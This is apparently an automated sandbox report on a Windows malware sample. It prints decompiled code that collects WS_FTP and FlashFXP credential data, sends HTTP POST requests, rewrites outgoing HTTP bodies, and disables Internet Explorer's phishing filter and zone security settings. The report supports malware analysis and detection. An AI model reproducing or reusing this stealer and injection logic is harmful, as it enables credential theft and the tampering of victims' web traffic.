							__eflags = _t140 - 1;
							if(_t140 == 1) {
								__eflags = _v64;
								if(_v64 > 0) {
									E00412A19( &_v348);
								}
							}
							goto L21;
						}
						_t143 = _t135 - 1;
						if(_t143 == 0 || _t143 == 1) {
							_v12 = _v12 | 0x00000001;
							goto L20;
						} else {
							goto L21;
						}
					}
					if(_t130 == 0x2d) {
						goto L12;
					}
					if(_t130 == 0x40) {
						goto L12;
					}
					if(_t130 == 0x5e) {
						_t151 = 4;
						goto L12;
					} else {
						_t151 = 0;
						goto L13;
					}
					L22:
					_t152 = _t163;
					_t163 = E0040A6CE(_t163, 1);
				} while (_t163 != 0);
				goto L23;
			}

0x00404065
0x00404065
0x0040406e
0x00404071
0x00404077
0x0040407b
0x0040407d
0x00404122
0x00404126
0x00404128
0x0040412b
0x0040412d
0x00404141
0x00404141
0x0040412d
0x00404145
0x0040414b
0x004041d8
0x004041d8
0x00000000
0x00404151
0x00404151
0x00404164
0x00000000
0x00000000
0x00404166
0x0040416b
0x00404171
0x004041dc
0x004041e0
0x004041f0
0x004041f4
0x004041fa
0x004041fe
0x00404345
0x00404345
0x0040434a
0x00404374
0x00404374
0x00404354
0x00404356
0x00404356
0x0040435e
0x0040436a
0x0040436a
0x00000000
0x0040436e
0x00404204
0x00404209
0x0040420f
0x0040421a
0x0040421e
0x0040425c
0x0040425e
0x0040427e
0x00404283
0x00404286
0x00404289
0x0040428b
0x0040428b
0x0040428e
0x00404291
0x00404341
0x00404341
0x00000000
0x00404341
0x0040429a
0x004042a8
0x004042ad
0x004042b1
0x004042b5
0x004042bc
0x004042c9
0x004042d8
0x004042da
0x004042dd
0x004042e4
0x004042e6
0x004042e6
0x004042e8
0x004042ed
0x004042ef
0x004042ef
0x004042f8
0x004042fa
0x004042fa
0x004042ff
0x00404302
0x00404303
0x0040430a
0x00404323
0x00404323
0x00404327
0x00404327
0x0040432f
0x00404337
0x0040433f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040433f
0x00404260
0x00404265
0x00404267
0x00404267
0x0040426d
0x00000000
0x0040426d
0x00404223
0x00404228
0x0040422b
0x0040422d
0x00000000
0x00000000
0x00404233
0x00404235
0x00404238
0x00000000
0x00000000
0x00000000
0x00000000
0x0040423a
0x0040423a
0x0040423d
0x00404240
0x00404242
0x00404245
0x0040424c
0x0040424f
0x00404251
0x00404251
0x00404247
0x00404247
0x00404247
0x00404254
0x00404255
0x00404255
0x00000000
0x0040425a
0x00404211
0x00404216
0x00000000
0x00404216
0x004041f6
0x004041f6
0x00000000
0x004041f6
0x004041e6
0x00000000
0x004041ee
0x00000000
0x004041ee
0x00000000
0x00000000
0x00000000
0x0040416b
0x0040414b
0x00404091
0x00404096
0x00404099
0x0040409b
0x004040a5
0x0040411a
0x0040411d
0x00000000
0x00000000
0x00000000
0x00000000
0x004040a7
0x004040a7
0x004040a7
0x004040a7
0x004040ad
0x00000000
0x00000000
0x004040af
0x004040b3
0x004040d3
0x004040d3
0x004040d5
0x004040d8
0x004040e4
0x00000000
0x00000000
0x004040e9
0x004040ec
0x00404102
0x00404102
0x00404106
0x00404109
0x00000000
0x00000000
0x00000000
0x00404109
0x004040ee
0x004040ef
0x004041cf
0x00000000
0x004041cf
0x004040f5
0x004040f6
0x00404179
0x00404181
0x0040418c
0x00404198
0x0040419e
0x004041a5
0x004041ab
0x004041ae
0x004041b4
0x004041b8
0x004041c5
0x004041c5
0x004041b8
0x00000000
0x004041ae
0x004040f8
0x004040f9
0x004040fe
0x00000000
0x00000000
0x00000000
0x00000000
0x004040f9
0x004040b7
0x00000000
0x004040cd
0x004040bb
0x00000000
0x004040c9
0x004040bf
0x004040c5
0x00000000
0x004040c1
0x004040c1
0x00000000
0x004040c1
0x0040410b
0x0040410d
0x00404114
0x00404116
0x00000000

APIs

InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 004041A5
InternetCrackUrlA.WININET(?,00000008,00000000,?), ref: 004042CF

Strings

*FAILED TO PARSE "%s"*, xrefs: 00404278
application/x-www-form-urlencoded, xrefs: 00404156
*UNKNOWN*, xrefs: 00404260
*EMPTY*, xrefs: 00404211
%s%sReferer: %SUser input: %sData:%S, xrefs: 0040430F
*BLOCKED*, xrefs: 004042FA, 0040430A

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CrackInternet
String ID: *BLOCKED*$%s%sReferer: %SUser input: %sData:%S$*EMPTY*$*FAILED TO PARSE "%s"*$*UNKNOWN*$application/x-www-form-urlencoded
API String ID: 1381609488-1559281305
Opcode ID: e36040128e56cb123b1fcc41006542400295cc65ca160b8b2ed8698f57265e4b
Instruction ID: 9577ca87807d87a453b55c3b0b986da9c52cd2913c1421e9690d52129667f7dc
Opcode Fuzzy Hash: e36040128e56cb123b1fcc41006542400295cc65ca160b8b2ed8698f57265e4b
Instruction Fuzzy Hash: 28A136B0A00345AADF219BA0C849BBFBBB6AFD1304F14447FE6417A2D1D77D98868719

Uniqueness

Uniqueness Score: -1.00%

Function 00405D7C, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00405D7C(char** __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v548;
				short _v1068;
				void* __edi;
				void* __esi;
				char* _t23;
				WCHAR* _t37;
				signed int _t38;
				void* _t39;
				intOrPtr _t47;

				_t35 = __edx;
				E004098AA( &_v12,  &_v12, 0, 8);
				_t37 =  &_v548;
				_t23 = E0040ED7B(0x104, _t37, 0x80000001, L"SOFTWARE\\ipswitch\\ws_ftp", L"datadir");
				if(_t23 != 0xffffffff && _t23 > 0) {
					ExpandEnvironmentStringsW(_t37,  &_v1068, 0x104);
					_t23 = E00405B75( &_v1068,  &_v12);
				}
				if(_v8 == 0) {
					_v28 = 0x1a;
					_v24 = 0x26;
					_v20 = 0x23;
					_v16 = L"*ipswitch*";
					_t38 = 0;
					do {
						_t23 =  &_v548;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t39 + _t38 * 4 - 0x18)), 0, 0, _t23);
						_t45 = _t23;
						if(_t23 == 0) {
							_t35 =  &_v16;
							_t23 = E0040B4D8( &_v548,  &_v16, _t45, 1, 2, E00405B9D,  &_v12, 0, 0, 0);
						}
						_t38 = _t38 + 1;
					} while (_t38 < 3);
					_t47 = _v8;
				}
				if(_t47 > 0) {
					E00412508(_t23, _v12, _t35, _t47, L"WS_FTP");
				}
				return E004097F7(_v12);
			}

0x00405d7c
0x00405d91
0x00405daa
0x00405db0
0x00405db8
0x00405dc9
0x00405dd9
0x00405dd9
0x00405de1
0x00405de3
0x00405dea
0x00405df1
0x00405df8
0x00405dff
0x00405e01
0x00405e01
0x00405e0f
0x00405e15
0x00405e17
0x00405e29
0x00405e32
0x00405e32
0x00405e37
0x00405e38
0x00405e3d
0x00405e3d
0x00405e40
0x00405e4a
0x00405e4a
0x00405e5b

APIs

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,80000001,SOFTWARE\ipswitch\ws_ftp,datadir,?,00000000,00000008), ref: 00405DC9
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,80000001,SOFTWARE\ipswitch\ws_ftp,datadir,?,00000000,00000008), ref: 00405E0F

Strings

SOFTWARE\ipswitch\ws_ftp, xrefs: 00405D9B
#, xrefs: 00405DF1
WS_FTP, xrefs: 00405E45
*ipswitch*, xrefs: 00405DF8
&, xrefs: 00405DEA
datadir, xrefs: 00405D96

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandFolderPathStrings
String ID: #$&$*ipswitch*$SOFTWARE\ipswitch\ws_ftp$WS_FTP$datadir
API String ID: 1452579279-1839599621
Opcode ID: 4fb15aaa69f691bb1333331d55a590a383eb4425b040b32e5969ca79be2e2547
Instruction ID: 70bc6e024199b99dcd6e5e00357b857d5a36bc4f7a6a9f0c867153ae0b6ef388
Opcode Fuzzy Hash: 4fb15aaa69f691bb1333331d55a590a383eb4425b040b32e5969ca79be2e2547
Instruction Fuzzy Hash: 89214FB2A00118BADB10AB95DC89EEF777CEB04348F10407BB611B61D1D6785F85CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004055DD, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004055DD(char** __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v548;
				short _v1068;
				void* __edi;
				void* __esi;
				char* _t23;
				WCHAR* _t37;
				signed int _t38;
				void* _t39;
				intOrPtr _t47;

				_t35 = __edx;
				E004098AA( &_v12,  &_v12, 0, 8);
				_t37 =  &_v548;
				_t23 = E0040ED7B(0x104, _t37, 0x80000002, L"SOFTWARE\\FlashFXP\\3", L"datafolder");
				if(_t23 != 0xffffffff && _t23 > 0) {
					ExpandEnvironmentStringsW(_t37,  &_v1068, 0x104);
					_t23 = E004053D2( &_v12);
				}
				if(_v8 == 0) {
					_v28 = 0x23;
					_v24 = 0x1a;
					_v20 = 0x26;
					_v16 = L"*flashfxp*";
					_t38 = 0;
					do {
						_t23 =  &_v548;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t39 + _t38 * 4 - 0x18)), 0, 0, _t23);
						_t45 = _t23;
						if(_t23 == 0) {
							_t35 =  &_v16;
							_t23 = E0040B4D8( &_v548,  &_v16, _t45, 1, 2, E0040540A,  &_v12, 0, 0, 0);
						}
						_t38 = _t38 + 1;
					} while (_t38 < 3);
					_t47 = _v8;
				}
				if(_t47 > 0) {
					E00412508(_t23, _v12, _t35, _t47, L"FlashFXP");
				}
				return E004097F7(_v12);
			}

0x004055dd
0x004055f2
0x0040560b
0x00405611
0x00405619
0x0040562a
0x0040563a
0x0040563a
0x00405642
0x00405644
0x0040564b
0x00405652
0x00405659
0x00405660
0x00405662
0x00405662
0x00405670
0x00405676
0x00405678
0x0040568a
0x00405693
0x00405693
0x00405698
0x00405699
0x0040569e
0x0040569e
0x004056a1
0x004056ab
0x004056ab
0x004056bc

APIs

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,80000002,SOFTWARE\FlashFXP\3,datafolder,?,00000000,00000008), ref: 0040562A
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,80000002,SOFTWARE\FlashFXP\3,datafolder,?,00000000,00000008), ref: 00405670

Strings

datafolder, xrefs: 004055F7
*flashfxp*, xrefs: 00405659
SOFTWARE\FlashFXP\3, xrefs: 004055FC
#, xrefs: 00405644
FlashFXP, xrefs: 004056A6
&, xrefs: 00405652

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandFolderPathStrings
String ID: #$&$*flashfxp*$FlashFXP$SOFTWARE\FlashFXP\3$datafolder
API String ID: 1452579279-2914266125
Opcode ID: a958bb0c54800d46158cf0a0d729a866b73a2e997e5829ff4db041a4d43dc555
Instruction ID: 378d6ca4e251ff040e5d3960efc37a14b55815b444e39fac56b54a9bacc65119
Opcode Fuzzy Hash: a958bb0c54800d46158cf0a0d729a866b73a2e997e5829ff4db041a4d43dc555
Instruction Fuzzy Hash: 47214FB2E00218BADB10AA95DCC9EEFB77CEB04345F50047BB605B21D1D6795E858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AAD7, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040AAD7(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
				long _t18;
				char* _t21;
				signed int _t29;
				char* _t30;
				void* _t32;

				_t29 = _a20 & 0x00000002;
				_t18 = 0x8404f700;
				if(_t29 != 0) {
					_t18 = 0x8444f700;
				}
				if((_a20 & 0x00000004) != 0) {
					_t18 = _t18 | 0x00800000;
				}
				_t30 = "POST";
				if((_a20 & 0x00000001) == 0) {
					_t30 = "GET";
				}
				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, 0x419000, _t18, 0);
				if(_t32 == 0) {
					L15:
					return 0;
				} else {
					if(_t29 == 0) {
						_push(0x13);
						_t21 = "Connection: close\r\n";
						_pop(0);
					} else {
						_t21 = 0;
					}
					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
						L14:
						InternetCloseHandle(_t32);
						goto L15;
					} else {
						_a20 = _a20 & 0x00000000;
						_a8 = 4;
						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
							goto L14;
						} else {
							return _t32;
						}
					}
				}
			}

0x0040aade
0x0040aae2
0x0040aae7
0x0040aae9
0x0040aae9
0x0040aaf2
0x0040aaf4
0x0040aaf4
0x0040aafd
0x0040ab02
0x0040ab04
0x0040ab04
0x0040ab25
0x0040ab29
0x0040ab89
0x00000000
0x0040ab2b
0x0040ab2d
0x0040ab35
0x0040ab37
0x0040ab3c
0x0040ab2f
0x0040ab2f
0x0040ab31
0x0040ab4e
0x0040ab82
0x0040ab83
0x00000000
0x0040ab50
0x0040ab50
0x0040ab64
0x0040ab73
0x00000000
0x0040ab7e
0x00000000
0x0040ab7e
0x0040ab73
0x0040ab4e

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00419000,8404F700,00000000), ref: 0040AB1F
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 0040AB46
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 0040AB6B
InternetCloseHandle.WININET(00000000), ref: 0040AB83

Strings

HTTP/1.1, xrefs: 0040AB13
POST, xrefs: 0040AAFD
GET, xrefs: 0040AB04, 0040AB1B
Connection: close, xrefs: 0040AB37, 0040AB44

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
String ID: Connection: close$GET$HTTP/1.1$POST
API String ID: 3080274660-1621676011
Opcode ID: b845cd61b2281eabe1c02a1c749b283243685b3a7e9ca67ef254d365ce712ddb
Instruction ID: fe8bb67697bf3a27da17a6b372c7a79c2f063cffa21b7a271b1fcb636e6b911c
Opcode Fuzzy Hash: b845cd61b2281eabe1c02a1c749b283243685b3a7e9ca67ef254d365ce712ddb
Instruction Fuzzy Hash: 38114F312503097BEB218E549D45FEB3BA99B14754F144036FE01A51E0D7B8EA60C7EE

Uniqueness

Uniqueness Score: -1.00%

Function 0041491F, Relevance: 13.8, APIs: 6, Strings: 3, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041491F(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed char _v32;
				char _v36;
				char _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t100;
				signed int _t101;
				signed int _t102;
				intOrPtr _t104;
				void* _t105;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				intOrPtr _t120;
				void* _t128;
				void* _t132;
				signed int _t140;
				void* _t150;
				struct _CRITICAL_SECTION* _t154;
				intOrPtr _t156;
				intOrPtr _t168;
				signed int _t170;
				signed int _t176;
				char _t178;
				void* _t179;
				intOrPtr _t181;
				signed int _t184;
				intOrPtr _t187;
				void* _t189;
				signed int _t190;
				void* _t192;
				void* _t193;
				void* _t194;

				E00407B30();
				_t100 = E00407B3F();
				_t181 = _a4;
				if(_t100 == 0 || _a8 == 0 || _a12 <= 0) {
					L43:
					_t101 =  *0x41ac5c(_t181, _a8, _a12);
					goto L44;
				} else {
					_t154 = 0x41ac38;
					EnterCriticalSection(0x41ac38);
					_t102 = E0041400F(_t181);
					if(_t102 == 0xffffffff) {
						L42:
						LeaveCriticalSection(_t154);
						goto L43;
					}
					_t104 = _t102 * 0x38 +  *0x41ac54;
					if( *((intOrPtr*)(_t104 + 0x30)) > 0) {
						L33:
						_t184 =  *((intOrPtr*)(_t104 + 0x30)) -  *((intOrPtr*)(_t104 + 0x34));
						__eflags = _a12 - _t184;
						if(_a12 < _t184) {
							_t184 = _a12;
						}
						_t87 = _t104 + 0x2c; // -4303912
						_t175 = _t87;
						_t105 = E00409833(_a8,  *_t87 +  *((intOrPtr*)(_t104 + 0x34)), _t184);
						 *((intOrPtr*)(_t105 + 0x34)) =  *((intOrPtr*)(_t105 + 0x34)) + _t184;
						__eflags =  *((intOrPtr*)(_t105 + 0x34)) -  *((intOrPtr*)(_t105 + 0x30));
						if( *((intOrPtr*)(_t105 + 0x34)) ==  *((intOrPtr*)(_t105 + 0x30))) {
							E004097F7( *_t175);
							E00409898(_t175, 0xc);
						}
						LeaveCriticalSection(_t154);
						_t101 = _t184;
						L44:
						return _t101;
					}
					if( *((intOrPtr*)(_t104 + 0x10)) <= 0) {
						goto L42;
					}
					LeaveCriticalSection(0x41ac38);
					_t108 =  *0x41ac5c(_t181, _a8, _a12);
					_v52 = _t108;
					if(_t108 <= 0xffffffff) {
						L41:
						_t101 = _v52;
						goto L44;
					}
					EnterCriticalSection(0x41ac38);
					_t109 = E0041400F(_t181);
					_t176 = _t109;
					if(_t176 == 0xffffffff) {
						L38:
						_push(8);
						_push(0xffffe890);
						L39:
						 *0x41ac34();
						_v52 = _v52 | 0xffffffff;
						L40:
						LeaveCriticalSection(_t154);
						goto L41;
					}
					_t170 = _v52;
					if(_t170 == 0) {
						L11:
						_t178 = _t176 * 0x38 +  *0x41ac54;
						_v36 = _t178;
						if(_t170 > 0) {
							E00409833( *((intOrPtr*)(_t178 + 0x14)) +  *((intOrPtr*)(_t178 + 0x18)), _a8, _t170);
							 *((intOrPtr*)(_t178 + 0x18)) =  *((intOrPtr*)(_t178 + 0x18)) + _t170;
						}
						_t111 = E00414534(_t157,  &_v20,  *((intOrPtr*)(_t178 + 0x14)),  *((intOrPtr*)(_t178 + 0x18)));
						_v52 = _t111;
						if(_t111 == 1) {
							_t120 = E004146DC( &_v20,  *((intOrPtr*)(_t178 + 0x18)),  *((intOrPtr*)(_t178 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
							_v60 = _t120;
							if(_t120 == 1) {
								if(E00404375( *((intOrPtr*)(_t178 + 0x10)),  *((intOrPtr*)(_t178 + 0xc)),  *((intOrPtr*)(_t178 + 4)),  &_v48,  &_v40) != 0) {
									_t156 = _v40;
									_t128 =  *((intOrPtr*)(_t178 + 0x18)) - _v8 + _v12;
									_t129 = _t128 + _t156 + 0x14;
									if(_t128 + _t156 + 0x14 != 0) {
										_t187 = E004097CC(_t129);
										_v40 = _t187;
										if(_t187 != 0) {
											_t132 = E00409833(_t187,  *((intOrPtr*)(_t178 + 0x14)), _v12);
											_push(_t156);
											if((_v32 & 0x00000002) == 0) {
												E00409F05( &_v32);
												_t189 = E0040FE63(_t187, _v16, "Content-Length",  &_v36) + _v60;
												E00409833(_t189, _v68, _t156);
												_t190 = _t189 + _t156;
												__eflags = _t190;
											} else {
												_push("%x\r\n");
												_t192 = _t187 + _t132;
												_t179 = 0xd;
												_t193 = _t192 + E0040A4FB(_t132, _t179, _t192);
												E00409833(_t193, _v48, _t156);
												_t194 = _t193 + _t156;
												E00409833(_t194, "\r\n0\r\n\r\n", 7);
												_t178 = _v60;
												_t190 = _t194 + 7;
											}
											_t138 =  *((intOrPtr*)(_t178 + 0x18));
											if(_v8 !=  *((intOrPtr*)(_t178 + 0x18))) {
												_t190 = _t190 + E00409833(_t190,  *((intOrPtr*)(_t178 + 0x14)) + _v8, _t138 - _v8);
											}
											E004097F7( *((intOrPtr*)(_t178 + 0x14)));
											_t140 = _v44;
											 *((intOrPtr*)(_t178 + 0x14)) = _t140;
											 *((intOrPtr*)(_t178 + 0x18)) = _t190 - _t140;
										}
									}
								}
								_v44 = _v44 | 0xffffffff;
								E004097F7(_v48);
							}
							_t154 = 0x41ac38;
						}
						if(_v52 <= 0) {
							L30:
							if(__eflags == 0) {
								L32:
								 *((intOrPtr*)(_t178 + 0x2c)) =  *((intOrPtr*)(_t178 + 0x14));
								 *((intOrPtr*)(_t178 + 0x30)) =  *((intOrPtr*)(_t178 + 0x18));
								 *((intOrPtr*)(_t178 + 0x34)) = 0;
								 *((intOrPtr*)(_t178 + 0x14)) = 0;
								 *((intOrPtr*)(_t178 + 0x18)) = 0;
								E00404821( *((intOrPtr*)(_t178 + 0x10)),  *((intOrPtr*)(_t178 + 0xc)));
								_t104 = _v40;
								 *((intOrPtr*)(_t178 + 0x10)) = 0;
								 *((intOrPtr*)(_t178 + 0xc)) = 0;
								goto L33;
							}
							__eflags = _v44 - 0xffffffff;
							if(_v44 != 0xffffffff) {
								goto L40;
							}
							goto L32;
						} else {
							if(_v44 != 0) {
								__eflags = _v52;
								goto L30;
							}
							_push(0);
							_push(0xffffe892);
							goto L39;
						}
					}
					_t168 =  *0x41ac54; // 0x0
					_t150 = _t109 * 0x38 + _t168;
					_t157 =  *((intOrPtr*)(_t150 + 0x18)) + _t170;
					_t11 = _t150 + 0x14; // 0x14
					if(E00409787( *((intOrPtr*)(_t150 + 0x18)) + _t170, _t11) == 0) {
						goto L38;
					} else {
						_t170 = _v52;
						goto L11;
					}
				}
			}

0x0041492b
0x00414930
0x00414935
0x0041493a
0x00414c30
0x00414c37
0x00000000
0x00414954
0x0041495a
0x00414960
0x00414962
0x0041496a
0x00414c29
0x00414c2a
0x00000000
0x00414c2a
0x00414973
0x0041497d
0x00414bc3
0x00414bc6
0x00414bc9
0x00414bcc
0x00414bce
0x00414bce
0x00414bd1
0x00414bd1
0x00414bde
0x00414be3
0x00414be9
0x00414bec
0x00414bf0
0x00414bf8
0x00414bf8
0x00414bfe
0x00414c04
0x00414c40
0x00414c46
0x00414c46
0x00414987
0x00000000
0x00000000
0x0041498e
0x0041499b
0x004149a7
0x004149ab
0x00414c23
0x00414c23
0x00000000
0x00414c23
0x004149b2
0x004149b4
0x004149b9
0x004149be
0x00414c08
0x00414c08
0x00414c0a
0x00414c0f
0x00414c0f
0x00414c15
0x00414c1c
0x00414c1d
0x00000000
0x00414c1d
0x004149c4
0x004149ca
0x004149f0
0x004149f3
0x004149f9
0x004149ff
0x00414a0c
0x00414a11
0x00414a11
0x00414a1e
0x00414a23
0x00414a2a
0x00414a4e
0x00414a53
0x00414a5a
0x00414a7a
0x00414a87
0x00414a8b
0x00414a8f
0x00414a95
0x00414aa0
0x00414aa2
0x00414aa8
0x00414ab7
0x00414ac1
0x00414ac2
0x00414afe
0x00414b1e
0x00414b23
0x00414b28
0x00414b28
0x00414ac4
0x00414ac4
0x00414acb
0x00414acd
0x00414ada
0x00414add
0x00414ae9
0x00414aec
0x00414af1
0x00414af5
0x00414af5
0x00414b2a
0x00414b31
0x00414b46
0x00414b46
0x00414b4b
0x00414b50
0x00414b56
0x00414b59
0x00414b59
0x00414aa8
0x00414a95
0x00414b60
0x00414b65
0x00414b65
0x00414b6a
0x00414b6a
0x00414b75
0x00414b8c
0x00414b8c
0x00414b99
0x00414b9f
0x00414ba5
0x00414bab
0x00414bae
0x00414bb1
0x00414bb4
0x00414bb9
0x00414bbd
0x00414bc0
0x00000000
0x00414bc0
0x00414b8e
0x00414b93
0x00000000
0x00000000
0x00000000
0x00414b77
0x00414b7b
0x00414b88
0x00000000
0x00414b88
0x00414b7d
0x00414b7e
0x00000000
0x00414b7e
0x00414b75
0x004149cc
0x004149d5
0x004149da
0x004149dc
0x004149e6
0x00000000
0x004149ec
0x004149ec
0x00000000
0x004149ec
0x004149e6

APIs

Part of subcall function 00407B30: WaitForSingleObject.KERNEL32(000000FF,004034D2), ref: 00407B38

Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47

EnterCriticalSection.KERNEL32(0041AC38), ref: 00414960
LeaveCriticalSection.KERNEL32(0041AC38), ref: 0041498E
EnterCriticalSection.KERNEL32(0041AC38), ref: 004149B2
LeaveCriticalSection.KERNEL32(0041AC38,00000000,?,?), ref: 00414BFE
LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414C1D

Part of subcall function 0040FE63: StrCmpNIA.SHLWAPI(?,?,?,?,?), ref: 0040FEBD

Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A

LeaveCriticalSection.KERNEL32(0041AC38), ref: 00414C2A

Strings

0, xrefs: 00414AE4
%x, xrefs: 00414AC4
Content-Length, xrefs: 00414B08

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterObjectSingleWait$FreeHeap
String ID: 0$%x$Content-Length
API String ID: 197861008-3838797520
Opcode ID: cb774bb6b26966c6faf7806a6d635503f0b2aae53758b7aa508304f46053c982
Instruction ID: 50d63c3ca1dd5c6796bca38f05d1307c0062cb0d226f1c9c44c6a92a87ef72d5
Opcode Fuzzy Hash: cb774bb6b26966c6faf7806a6d635503f0b2aae53758b7aa508304f46053c982
Instruction Fuzzy Hash: 7391B072504206AFC710EF25CD8199ABBB5FF84314F05462FF850A72A2D738E995CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 00412E18, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00412E18(void* __ecx) {
				void* __edi;
				void* _t22;
				void* _t31;
				void* _t33;
				void* _t35;
				void* _t36;
				intOrPtr* _t38;
				char* _t44;
				intOrPtr* _t46;
				void* _t48;
				void* _t50;

				_t33 = __ecx;
				_t48 = _t50 - 0x78;
				 *0x41aa50 =  *0x41aa50 & 0x00000000;
				 *0x41aa54 =  *0x41aa54 & 0x00000000;
				InitializeCriticalSection(0x41aa38);
				if( *0x41953c > 1) {
					 *(_t48 + 0x6c) = L"Enabled";
					 *(_t48 + 0x70) = L"EnabledV8";
					_t38 = _t48 + 0x6c;
					 *(_t48 + 0x74) = 2;
					_t44 = L"Software\\Microsoft\\Internet Explorer\\PhishingFilter";
					do {
						_t30 =  *_t38;
						if(E0040EDD3(_t33, 0x80000001, _t44,  *_t38) != 0) {
							E0040EE08(_t33, _t44, _t30);
						}
						_t38 = _t38 + 4;
						_t6 = _t48 + 0x74;
						 *_t6 =  *(_t48 + 0x74) - 1;
					} while ( *_t6 != 0);
					_t39 = L"CleanCookies";
					_t45 = L"Software\\Microsoft\\Internet Explorer\\Privacy";
					if(E0040EF91(_t33, L"Software\\Microsoft\\Internet Explorer\\Privacy", L"CleanCookies") == 0 || E0040EDD3(_t33, 0x80000001, L"Software\\Microsoft\\Internet Explorer\\Privacy", L"CleanCookies") != 0) {
						_t25 = E0040EE08(_t33, _t45, _t39);
					}
					 *(_t48 + 0x74) =  *(_t48 + 0x74) & 0x00000000;
					 *(_t48 + 0x64) = L"1406";
					 *(_t48 + 0x68) = L"1609";
					 *(_t48 + 0x70) = 5;
					do {
						_push( *(_t48 + 0x74));
						_push(L"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%u");
						_t36 = 0x64;
						_t25 = E0040A4B7(_t25, _t36, _t48 - 0x64);
						_pop(_t35);
						if(_t25 > 0) {
							_t46 = _t48 + 0x64;
							_t31 = 2;
							do {
								_t42 =  *_t46;
								if(E0040EDD3(_t35, 0x80000001, _t48 - 0x64,  *_t46) != 0) {
									_t25 = E0040EE08(_t35, _t48 - 0x64, _t42);
								}
								_t46 = _t46 + 4;
								_t31 = _t31 - 1;
							} while (_t31 != 0);
						}
